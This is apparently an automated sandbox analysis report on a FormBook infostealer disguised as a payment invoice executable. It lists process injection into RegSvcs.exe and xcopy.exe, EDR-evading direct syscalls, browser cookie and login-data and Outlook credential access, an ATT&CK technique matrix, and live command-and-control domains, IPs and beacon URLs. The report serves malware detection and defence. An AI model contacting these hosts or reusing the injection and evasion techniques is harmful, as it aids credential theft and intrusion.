                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014AD0 mov eax, dword ptr fs:[00000030h]3_2_01014AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014AD0 mov eax, dword ptr fs:[00000030h]3_2_01014AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101AAEE mov eax, dword ptr fs:[00000030h]3_2_0101AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101AAEE mov eax, dword ptr fs:[00000030h]3_2_0101AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01098D10 mov eax, dword ptr fs:[00000030h]3_2_01098D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01098D10 mov eax, dword ptr fs:[00000030h]3_2_01098D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01014D1D mov eax, dword ptr fs:[00000030h]3_2_01014D1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01068D20 mov eax, dword ptr fs:[00000030h]3_2_01068D20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDCCC8 mov eax, dword ptr fs:[00000030h]3_2_00FDCCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078D6B mov eax, dword ptr fs:[00000030h]3_2_01078D6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8C8D mov eax, dword ptr fs:[00000030h]3_2_00FD8C8D
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeThread register set: target process: 4816Jump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 739008Jump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: cJjnESPXORw.exe, 00000005.00000002.3912307416.0000000001081000.00000002.00000001.00040000.00000000.sdmp, cJjnESPXORw.exe, 00000005.00000000.2345394450.0000000001081000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                512
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541207 Sample: Due Payment Invoice PISS202... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 34 www.theawareness.shop 2->34 36 www.shintow.net 2->36 38 13 other IPs or domains 2->38 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Yara detected AntiVM3 2->46 48 4 other signatures 2->48 10 Due Payment Invoice PISS2024993.exe 3 2->10         started        signatures3 process4 file5 26 Due Payment Invoice PISS2024993.exe.log, ASCII 10->26 dropped 58 Writes to foreign memory regions 10->58 60 Allocates memory in foreign processes 10->60 62 Injects a PE file into a foreign processes 10->62 14 RegSvcs.exe 10->14         started        signatures6 process7 signatures8 64 Maps a DLL or memory area into another process 14->64 17 cJjnESPXORw.exe 14->17 injected process9 dnsIp10 28 estrela-b.online 162.241.63.77, 49996, 49997, 49998 UNIFIEDLAYER-AS-1US United States 17->28 30 ghs.googlehosted.com 142.250.185.115, 49949, 49964, 49978 GOOGLEUS United States 17->30 32 7 other IPs or domains 17->32 40 Found direct / indirect Syscall (likely to bypass EDR) 17->40 21 xcopy.exe 13 17->21         started        signatures11 process12 signatures13 50 Tries to steal Mail credentials (via file / registry access) 21->50 52 Tries to harvest and steal browser information (history, passwords, etc) 21->52 54 Modifies the context of a thread in another process (thread injection) 21->54 56 2 other signatures 21->56 24 firefox.exe 21->24         started        process14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Due Payment Invoice PISS2024993.exe34%ReversingLabsWin32.Trojan.Generic
                Due Payment Invoice PISS2024993.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.ila.beauty
                13.248.169.48
                truefalse
                  unknown
                  estrela-b.online
                  162.241.63.77
                  truefalse
                    unknown
                    www.ak711ka10.lat
                    154.23.181.7
                    truefalse
                      unknown
                      www.meanttobebroken.org
                      141.193.213.11
                      truefalse
                        unknown
                        mjmegartravel.online
                        76.223.67.189
                        truefalse
                          unknown
                          www.theawareness.shop
                          172.67.177.220
                          truefalse
                            unknown
                            www.mireela.pro
                            69.57.163.227
                            truefalse
                              unknown
                              ghs.googlehosted.com
                              142.250.185.115
                              truefalse
                                unknown
                                micrhyms.info
                                3.33.130.190
                                truefalse
                                  unknown
                                  energyparks.net
                                  3.33.130.190
                                  truefalse
                                    unknown
                                    www.micrhyms.info
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.mjmegartravel.online
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.estrela-b.online
                                        unknown
                                        unknownfalse
                                          unknown
                                          www.energyparks.net
                                          unknown
                                          unknownfalse
                                            unknown
                                            www.shintow.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.mireela.pro/mdol/?pZxtux=IBR/N437Xoj/lvQ/yaypF1iCxq0JhxtvQ9XvO2IN6lbwsaKUqIYSoc7J5DfSIcjVFUNu75pY4qnkQs5YcPPLlBdqXD3XopUqxrOy0G+yXtR7yOmR4k+PDTzACkBBVYCXxA==&C6=EXkTbfalse
                                                unknown
                                                http://www.mjmegartravel.online/t2sm/?pZxtux=94IeUqPLX3ZZBpOBWJjj6w05jpTx/xHCK3bXujG3CQTlZUuHvWSdywBNDw0UN7LA9SFuNcoJQf79ZomCfHkQBPJfdTEUnKSwwNjbiieOsGOn8kHnIz1RgyTaVPNwwy1Row==&C6=EXkTbfalse
                                                  unknown
                                                  http://www.energyparks.net/24sh/false
                                                    unknown
                                                    http://www.shintow.net/ow7i/false
                                                      unknown
                                                      http://www.shintow.net/ow7i/?pZxtux=D6NwXqVIZVbqudPbukfKSXslB0cDplrj7EaXwER037qfX6kPuWmDYfQvQA/Ze+QTmkPK0wpsgEVRbQCYLV+GBPPQtbW1nqz4pZ5COE7r30blXJdgErW3TYP6jwHTnZcx3A==&C6=EXkTbfalse
                                                        unknown
                                                        http://www.theawareness.shop/df5c/false
                                                          unknown
                                                          http://www.energyparks.net/24sh/?pZxtux=M41UUGwRPTDcYYp7NjzFchXqTu9ohCG2hnX9QOYTWHvuC0V13uvlBW/8MUrXzawQyQAEaeslrtJdAUXUhjCRxVhWrTu2Hm15Y+EHLS69Aj11G8IhKuKDs0JHRlg0rr8yhA==&C6=EXkTbfalse
                                                            unknown
                                                            http://www.ak711ka10.lat/o5z9/false
                                                              unknown
                                                              http://www.ila.beauty/qq33/?pZxtux=i6Dk+UJVjxglEXs09Tl/1hzZ7yI7sWOV9FpOihhS4ziFAzHmIjfzFnYav8OQcpUvdMfWm2GXI1cxWM9gtNVnhTwiButew2EOfjMP80SRQHDkyyZg6sD1yMmsAnC5II4onw==&C6=EXkTbfalse
                                                                unknown
                                                                http://www.meanttobebroken.org/zdt7/false
                                                                  unknown
                                                                  http://www.mireela.pro/mdol/false
                                                                    unknown
                                                                    http://www.micrhyms.info/uao9/?pZxtux=gsMVmNPJ8N9SSsJhvzgfzwwjqe07CXl0sVKqNnzNMDh6tN9OUV5g1ZhKr/MfkgGiHAPXbKUUpWb7OZdwItOAW4YYmA3iTr55JhOSegfIcMD9E8fUPg/eNtps2xYGlBIlpg==&C6=EXkTbfalse
                                                                      unknown
                                                                      http://www.mjmegartravel.online/t2sm/false
                                                                        unknown
                                                                        http://www.estrela-b.online/62tt/false
                                                                          unknown
                                                                          http://www.ak711ka10.lat/o5z9/?pZxtux=z11/8LNw/ilOmRo5iVplmq9QJ2/sY6O9S3jiPj8IKRvMXjps+f+3QxK4x8TDiA3fpLYwxgH4NhA45modVvBwao6NdyacUH38gYwDUqZfGQ230ajUqn4GEmUCWVLyRw7Now==&C6=EXkTbfalse
                                                                            unknown
                                                                            http://www.meanttobebroken.org/zdt7/?pZxtux=OdyTsfpKOp+FbfSBk3rtAPX6yl42tFHs0o0DPQC5l8EmE472eTQ0FDkunmNaJXsoU4tZbjlt6ORfso7icAjAvSN+KGdO51cWhvQZ2fU2V4w5zpyWN4cvAtWl9PkRGGXA+g==&C6=EXkTbfalse
                                                                              unknown
                                                                              http://www.theawareness.shop/df5c/?pZxtux=iTGQ2f3/8wLaRYQP0xZx681X5jLmVFU/oLVVEoegdR+OVsnqcEQj6iurR8BAvDospkEZVkGP6nTG7c6sAiwUrDOAfXxLGlgGaAd3CytgAtbKInIGuq2UlXDJcOT7zCeYfw==&C6=EXkTbfalse
                                                                                unknown
                                                                                http://www.micrhyms.info/uao9/false
                                                                                  unknown
                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://duckduckgo.com/chrome_newtabxcopy.exe, 00000006.00000002.3915201437.0000000007AF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
